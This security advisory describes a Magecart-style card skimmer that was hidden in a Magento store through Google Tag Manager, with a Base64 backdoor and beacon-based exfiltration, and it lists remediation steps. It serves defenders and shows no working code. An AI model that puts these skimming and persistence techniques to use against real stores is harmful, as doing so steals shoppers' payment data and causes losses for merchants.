Executive Summary
A recent investigation by Sucuri uncovered a sophisticated credit card skimmer on a Magento-based eCommerce website, leveraging Google Tag Manager (GTM) to inject malicious JavaScript and steal payment details. The malware was hidden within the cms_block.content database table, allowing attackers to discreetly intercept checkout page transactions. Further analysis by Sucuri revealed a backdoor in the media directory, granting persistent access to attackers. The malware exfiltrated credit card data in real-time, sending it to a remote server controlled by cybercriminals.
Community Impact
Retail and hospitality organizations, particularly those operating eCommerce platforms, are at high risk of similar GTM-based attacks. Attackers using stealthy, legitimate-looking scripts make it difficult for store owners to detect and respond to threats in real time. Since WordPress and Magento are popular eCommerce solutions, this attack methodology could be widely applicable across many retail and hospitality brands using these platforms. If not properly mitigated, businesses could suffer financial losses, chargebacks, and even compliance violations under PCI DSS regulations. RH-ISAC Organizations should ingest the intelligence in the report, the original report linked above, and the remediations steps, listed below.
Technical Analysis
The attack leveraged GTM to inject malicious JavaScript, allowing cybercriminals to steal credit card data entered during the checkout process. The malicious GTM payload included Base64-encoded and obfuscated scripts, designed to evade detection by traditional security tools. The malware targeted payment forms by either intercepting legitimate payment fields or injecting a fake form to trick users into entering their details.
The Sucuri investigation also uncovered a hidden backdoor in media/index.php, which allowed attackers to maintain persistent access and potentially reinfect the site. The backdoor operated by decoding and executing Base64-encoded payloads, effectively bypassing traditional security monitoring. Further research revealed that at least six websites were infected with the same GTM ID, indicating a broader campaign.
Attackers used dynamic script injection techniques to hide their payloads within what appeared to be a legitimate Google Analytics or GTM script. The malware used navigator.sendBeacon to exfiltrate stolen payment data to a malicious server. The campaign was linked to Magecart-style attacks, where cybercriminals inject malicious scripts into eCommerce platforms to steal credit card details.
Recommendations
Sucuri has provided the following remediations steps to remediate GTM-base malware:
- Remove any suspicious GTM tags. Log into GTM, identify, and delete any suspicious tags.
- Perform a full website scan to detect any other malware or backdoors.
- Remove any malicious scripts or backdoor files.
- Ensure Magento and all extensions are up-to-date with security patches.
- Regularly monitor site traffic and GTM for any unusual activity.
